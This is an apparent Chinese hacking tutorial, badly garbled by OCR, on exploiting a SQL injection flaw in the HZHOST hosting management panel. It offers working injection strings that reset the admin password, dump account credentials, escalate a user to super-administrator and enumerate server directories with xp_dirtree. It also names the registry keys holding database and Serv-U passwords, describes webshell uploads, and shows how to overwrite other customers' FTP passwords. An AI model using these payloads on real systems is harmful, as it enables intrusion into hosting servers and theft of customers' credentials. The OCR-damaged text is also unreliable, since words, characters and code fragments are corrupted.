【精编_推荐】HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用

1、这是一个域需主机实时管理系统。在百度搜索：title:（域名主机实时管理系统），会找到 大量采用这种系统的网站！太术语了。就是在线开通ftp.sql.web的一个管理系统。一套 web程序。和IIS管理程序。实现在线开通的玩意。所以：我们可以免费申请域名和空间！ ！ 哈哈！ ！ ！WGb程序方而写的非常严谨。大量的过滤。由于是商业版的程序，所以我没有源码。本来 是有的，但是放在家里的电脑上。放暑假时搞的shell现在都被删了。 我现在又比较懒, 就没去弄源代码0反正大家知道怎么弄的就行了。这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名 管理这里没过滤。止(D)

2、http:/J穴HZHOST 6.5按S壬岡管理系统严城名管理主机管理邮局管理数®库管理FTP空间管理域名管理7 域名：|123' and user。-1?W密码：wrtc'.woc F 0 ® d P搜索收赫夹"0陰g H 地址(Q) I http: /admin, tecrosbft OLE DB Provider for ODBC Drivers * 80040e07*domain/login. asp, 行 50Microsoft ODBC SQL Serv&v Driver SQL Ssnrer在将 iwatchar 値 hzho

3、st"转换成数据类型關爵官方放署假的时候就被我搞了一遍，过了一个月他发现了。删了我的shelL不知逍他怎么 知逍我从那里下的手搞的他。他居然补了漏洞。先上图再说下利用方法。123' UPDATE memlst SETu_pss='el0adc3949ba59abbe56e057f20f883e* WHERE u_nme='admin'-这一句是把用户admin的密码修改为123456管理员的后台地址一般是 http: /WWW 或者直接在首页登陆了按切换到管理员后台。切换到管理员后台，用P：a4nin ID: 10000002级别:超级管理管理普页遞出

4、系统域名虚拟圭机FTP至间数据库企业邮局租用托管网站建设帮助中右如果admin不是超级管理员，那就有三个办法。是自己构造语句爆出来Q二是提升自己注册的用户的权限。三是直接爆网站路径，再来个差异备份。第一个方法我给出一条示范语句:123* and (select top 1 isnull(cast(u_nme asnvarchar(4000)，char(32)+char(94)+isnull(cast(U_pss as nvarchar(4000)，char(32) from (select top 2u_nmdU_pss from hzhost.<memlst where 1=1 ord

5、er by u_nme) t order by u_nme desc )>0- and可以同时爆出一个用户的帐号和密码0想爆出尖他用户的语句自己构造吧。第二个方法是:123' UPDATE memlst SET u_sys=6 WHERE u_nme='你注册的用户名123* UPDATE memlst SET u_pwr=2 WHERE u_nme='你注册的用户名这2句话就能够提升自己为超级笛理员 第三个方法很麻烦。但是很有效果。直捣黄龙。很强大0我给出如下语句，大家自己研究 去吧！爆路径语句第一步：建立表 123' ;drop table foofo

6、ofoo;create table foofoofoo(id int identity (11) not null, name nvarchar (300) not nullj depth int not null, isfile nvarchar (50) null);- and第二步J 123' ;declare z nvarchar(4000) set z=0x63003a005c00 insert foofoofoo execute master.xp_dirtreeand-注意：0x63003a005c00 = C： 为 sql ENCODE其他的自己找丄具去转吧！第三步：暴

7、出总数 123' and (select cast(count(*) as varchar(8000)+char(94) from foofoofoo)>0- and第四步：暴出你想要的文件夹名字和文件名字123* and 0<(select top 1 cast(isfile as nvarchar(4000)+char(94)+cast(name as nvarchar(4000) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile descjoame

8、desc)- and修改中间红色的依次爆出。至于差异备份语句。让nbsi3告诉你吧。对HZHOST域名虚拟主机管理系统sql注射漏涓进一步利用I 我记得还有2篇关于hzhost的漏洞利用文章Q名字不记得了。大家去搜索"hzhost漏洞" 找找吧！里面提到下面两点内容！1。是提到c:windowstemp下有hzhost主机留下的ftp登陆记录。有用户洛和密码2。是利用hzhost拿系统主机最高权限的。安装了 hzhost的主机，苴mssql sa密码,mysql root密码还有serv-u的adm泊istrator 密码全部保存在注册表中Q位置在HKEY_LOCA l&#

9、187;_MACHINEsoftwarGhzhostconfigsettingsmysqlpass HKEY_LOC Al»_ MACHINEsoftwarGhzhostconfigsettingsmastGrsvrpass经过了 hzhost自己的加密方式，象 eLVCIO4tzsKBf#dee52443a3872ccl59这样的字符串。不过在hzhost后台可以还原！拿到了 S8密码，或者root密码，最高权限 就在眼前！禁止了 W.S的话Q大家就传aspx木马导撇！我们传了一个asp木马上去后.在incsconstr.asp下面可以看到数据库连接串。然后连 接到数据库。通过执行

10、SELECT * FROM hstlst语句。可以看到很多主机记录。如图String：SQL厂 u SELECT * FROMComtnajids；表del del del del del del del del del del del del del del 名 acclst advlst afflst qpppol erelst artist atosys cl si st disdme dis ftp disusr dm cist dm el st dmereo dnh_ftpusr10000471sfbnl10000510flymh_ftppssh_cprrune h_prdaPffw

11、3j4iWaKS31HHBc£9 fc298l)l d3d0a.本站系统 ttho s t0LT£Hu2izvKp |Sf2cbc4flc89656e6d90 本站茶妬 asp300h.appQol h_regsttpe h_ftpstapppo olOlOOl 2 1apppo olOlOOOS 1区10000423s"hxll2cg6LUAVsqvkeKp |#83 c5fl 2400471 d5ab5 本站系统 tbhostapppoolOlOOOB 1发现什么没有？ h_ftppass的密码和hzhost主机自己的加密串很相似。没错，主机管理的 密码也趕经

12、过他自己的加密方式加了密！而我们在主机管理的地方！新H地址:L1 21 9.1 39,24073-FTP用戶名：Ihzpsy£FTP密码:153(5333a 域名：L1服务器名:hosts 脚本限制:空间大小:F ASP r PHP r CGI r het f禁止下载r jsf r逊忆0 竜常翳器端删除畑站点仅删除ns中的WEB站点1不影响FTF的使用芫全删除该站点不仅删除ns中的WEB站点J而E删除FTP、系统用戶以艮主机扌艮目录删隊该站点以及订单芫全删除服务器端站点、目录J并删除数鋸库中的订单信息主机巌务S更换C实时生效看到明文密码。说明他又给还原回来了。明白了么？我们先通过as

13、px木马导出mysql, mssql的root,sa密码加密串后。2008-12-27 14:15:11Sywinfo I IlSSpy | WebShell | Command | SqlTools | SuExp | PartScan | RecCopyright(C)2008 Bin -> WW.RoOTkIt.WeT. Cn -> Reverse-IPKEY J |HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsVALUE J Imysqlpass. ReadResult : aPW3j4zHaK831HMBo£9fc298bid3d0a我们通过这条语句，修改别人的主机密码。UPDATE hstlst SETh_ftppss='aPWw3j4zMaK831HMBof9fc298bld3d0a' WHERE h_ID=10000471然后回过头去看主机密码。（这时候被转成了明文）壬全删除该站点以艮订单I穿全删除艮务器端站点.目录，并891隊数据库中貳新IP地址:F17用户名:FTF密码:域名： e 服务器名